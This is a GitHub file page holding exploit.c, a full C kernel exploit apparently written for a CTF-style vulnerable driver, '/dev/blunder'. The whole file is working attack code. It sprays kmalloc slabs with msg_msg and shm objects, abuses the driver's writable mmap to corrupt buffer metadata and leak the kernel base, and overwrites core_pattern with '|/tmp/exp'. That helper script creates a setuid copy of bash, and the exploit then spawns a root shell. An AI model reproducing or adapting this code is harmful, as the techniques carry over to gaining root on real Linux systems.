-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.c
330 lines (256 loc) · 9.68 KB
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#define IPC "/dev/blunder"
#define PAGESZ 4096
#define INIT_IPC_NS 0xc7e0
#define KBASE_OFF 0x149c7e0
#define CORE_PATTERN 0x146cf00
#define CORE_PATTERN_OFFSET 0x8
#define CORE_FILE "|/tmp/exp"
#define IOCTL_BLUNDER_SEND_MSG _IOWR('s', 2, struct blunder_user_message)
#define IOCTL_BLUNDER_RECV_MSG _IOWR('s', 3, struct blunder_user_message)
static int qids[5];
static int shmids[200];
static void *shmaddr[200];
static void kill_shm(int idx);
static unsigned long kbase_addr = 0x0;
static unsigned long core_pattern = 0x0;
struct blunder_user_message{
int handle;
int opcode;
void *data;
size_t data_size;
size_t *offsets;
size_t offsets_size;
int *fds;
size_t num_fds;
};
struct blunder_buffer{
unsigned long *next;
unsigned long *prev;
unsigned long atomic_free;
size_t buffer_size;
size_t data_size;
size_t offsets_size;
};
void bind_cpu(void){
int ret;
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(0, &cpu_set);
ret = sched_setaffinity(0, sizeof(cpu_set_t), &cpu_set);
if (ret < 0){ fprintf(stderr, "[!] cpu bind failed!\n"); _exit(-1); }
fprintf(stderr, "[+] Binding CPU to 0 core!\n");
}
int blunder_send_message(int fd, void *data, size_t data_size){
int fds = {1337};
struct blunder_user_message umsg = {
.handle = getpid(),
.opcode = 0x0,
.data = data,
.data_size = data_size,
.offsets = NULL,
.offsets_size = 0x0,
.fds = &fds,
.num_fds = sizeof(fds)/sizeof(int),
};
ioctl(fd, IOCTL_BLUNDER_SEND_MSG, &umsg);
}
int leak_kaddress(size_t size){
for(int i = 0;i < sizeof(qids)/sizeof(int); i++){
void *mem = malloc(size);
memset(mem, 0, size);
if(mem == NULL) continue;
int ret = msgrcv(qids[i], mem, size, 0, IPC_NOWAIT|MSG_COPY|MSG_NOERROR);
if (ret < 0) {perror("recv_msg: msgrcv"); _exit(-1); }
if (ret == size){
unsigned long *addr = (unsigned long *)mem;
for(int ii = 0; ii < size/8; ii++){
if ((addr[ii] & 0xffff) == INIT_IPC_NS){
fprintf(stderr, "[+] Leaked kernel address: %p\n", addr[ii]);
kbase_addr = addr[ii] - KBASE_OFF;
//for(int x = 0; x < 200; x++) kill_shm(x);
return i; //it returns the object near
}
}
}else{ free(mem); continue; }
}
goto fail;
fail:
for(int i = 0;i < 200; i++) kill_shm(i);
return -1;
}
void alloc_shm(int idx){
shmids[idx] = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT|0600);
if (shmids[idx] < 0){ perror("alloc_shm: shmget"); _exit(-1); }
shmaddr[idx] = (void *) shmat(shmids[idx], NULL, SHM_RDONLY);
if (shmids[idx] < 0){ perror("alloc_shm: shmat"); _exit(-1); }
}
void kill_shm(int idx){
shmdt(shmaddr[idx]);
shmctl(shmids[idx], IPC_RMID, NULL);
}
void send_msg(int qid, long type, int size, int c){
struct msgbuf{
long mtype;
char mtext[size];
}msg;
msg.mtype = type;
memset(msg.mtext, c, sizeof(msg.mtext) - 0x8);
memset((msg.mtext + sizeof(msg.mtext)-0x8), 0xcc, 0x8);
if(msgsnd(qid, &msg, sizeof(msg.mtext), IPC_NOWAIT) == -1){
perror("send_msg: msgsnd");
_exit(-1);
}
}
/*
- Spray these objects in kmalloc-4k slab cache
- There is a total No of 8 objects pers slab
- The aim is to fill the partial slab to trigger the allocation of a new page(slab)
- Allocate maybe 3 slabs, victim object, 4 msg_msg
*/
void spray_msg_msg(){
for(int i = 0;i < sizeof(qids)/sizeof(int); i++){
qids[i] = msgget(IPC_PRIVATE, IPC_CREAT|0666);
if (qids[i] < 0){
perror("msgget");
_exit(-1);
}
}
//send a message to trigger the allocation of struct msgmsg and struct msgseg
for(int i = 0;i < sizeof(qids)/sizeof(int); i++){
send_msg(qids[i], (i+1), 0xfe8, (0x41 + i));
}
}
void kill_qid(int qid){
if(msgctl(qid, IPC_RMID, NULL) < 0){
perror("msgctl()");
_exit(-1);
}
}
void create_core_file(void){
int fd = open("/tmp/exp", O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);
if (fd < 0) {fprintf(stderr, "[!] cannot create core_file!\n"); _exit(-1); }
unsigned char *content = "#! /bin/bash\n"
"\ncp /bin/bash /tmp/bash\n"
"chmod 4755 /tmp/bash\n";
int writesz = write(fd, content, strlen(content));
if (writesz != strlen(content)){
fprintf(stderr, "[!] Error writing to file!\n");
_exit(-1);
}
close(fd);
}
int verify_exploit(void){
char buffer[256];
memset(buffer, 0, sizeof(buffer));
int fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
int readsz = read(fd, buffer, strlen(CORE_FILE));
fprintf(stderr, "[+] core_pattern: %s\n", buffer);
close(fd);
if (strncmp(buffer, CORE_FILE, strlen(CORE_FILE)) == 0)
return 1;
else
return 0;
}
void sighandler(int signum){
fprintf(stderr, "[-] Returning Shell :wink!\n");
system("/tmp/bash -p");
}
int main(int argc, char **argv){
unsigned long *addr;
bind_cpu();
int fds = open(IPC, O_RDWR);
if (fds < 0){
fprintf(stderr, "[!] Error opening driver!\n");
_exit(-1);
}
fprintf(stderr, "[+] open'd '/dev/blunder' for O_RDWR!\n");
fprintf(stderr, "[+] spraying shm in kmalloc-32\n");
fprintf(stderr, "[+] spraying msg_msg in kmalloc-4k!\n");
for(int i = 0;i < 50; i++){
alloc_shm(i);
}
spray_msg_msg();
for(int i = 50; i < 100; i++)
alloc_shm(i);
//The vulnerable mmap implementation that triggers that call to kmalloc
addr = (unsigned long *) mmap(NULL, PAGESZ, PROT_READ, MAP_SHARED, fds, 0);
if (addr == NULL){
fprintf(stderr, "[!] mmap error!\n");
_exit(-1);
}
//spray kmalloc-32 objects
for(int i = 100;i < 150; i++)
alloc_shm(i);
spray_msg_msg();
for(int i = 150; i< 200; i++)
alloc_shm(i);
fprintf(stderr, "[+] mmap'd address: %p\n", addr);
int ret = mprotect((void *) addr, PAGESZ, PROT_READ|PROT_WRITE);
if (ret != 0){
fprintf(stderr, "[!] mprotect Error!\n");
_exit(-1);
}
fprintf(stderr, "[+] mprotect'd to (RW-)\n");
/*
- The following should split the current buffer into PAGESZ - (3960 + sizeof(*blunder_buffer))
*/
unsigned char buffer[3960];
memset(buffer, 0x43, sizeof(buffer));
blunder_send_message(fds, buffer, sizeof(buffer));
/*
The driver is vulnerable to an AAW: This can be used to modify the details
of the next 'blunder_buffer' that should allow us to trigger an OOB write (heapoverflow)
*/
addr[504] = (unsigned long) 80; //blunder_buffer buffer_size
//This can be used for debugging
unsigned long kheap_address = addr[502];
fprintf(stderr, "[+] Leaked kHeap address: %p\n", kheap_address);
//The payload (heapoverflow) to overwrite the msg_msg struct
int off = 0x5;
unsigned long payload[0x9];
memset(payload, 0x0, sizeof(payload));
payload[off++] = (unsigned long) 0x0;
payload[off++] = (unsigned long) kheap_address;
payload[off++] = (unsigned long) 0x1; //msg_type
payload[off++] = (unsigned long) 0x1010; //m_ts
blunder_send_message(fds, payload, sizeof(payload));
int idx = leak_kaddress(0x1010);
if (idx < 0){
fprintf(stderr, "[+] oop! kaddress leak failed!\n");
_exit(-1);
}
core_pattern = kbase_addr + CORE_PATTERN;
unsigned long fake_blunder_buffer = core_pattern - 0x38;
fprintf(stderr, "[+] kBase address: %p\n", kbase_addr);
fprintf(stderr, "[+] Core Pattern: %p\n", core_pattern);
fprintf(stderr, "[+] Fake blunder_buffer: %p\n", fake_blunder_buffer);
//The modification of the next pointer to point to fake blunder_buffer
addr[504 - 0x3] = (unsigned long) fake_blunder_buffer;
create_core_file();
unsigned char final_payload[0x80];
memset(final_payload, 0x0, sizeof(final_payload));
strcpy((final_payload + CORE_PATTERN_OFFSET), CORE_FILE);
blunder_send_message(fds, final_payload, sizeof(final_payload));
//verify exploit - check that /sys/kernel/core_pattern = |/tmp/exp
fprintf(stderr, "[+] verifying exploit!\n");
if (verify_exploit()){
fprintf(stderr, "[+] Exploit successful!\n");
_exit(-1);
}
return 0;
}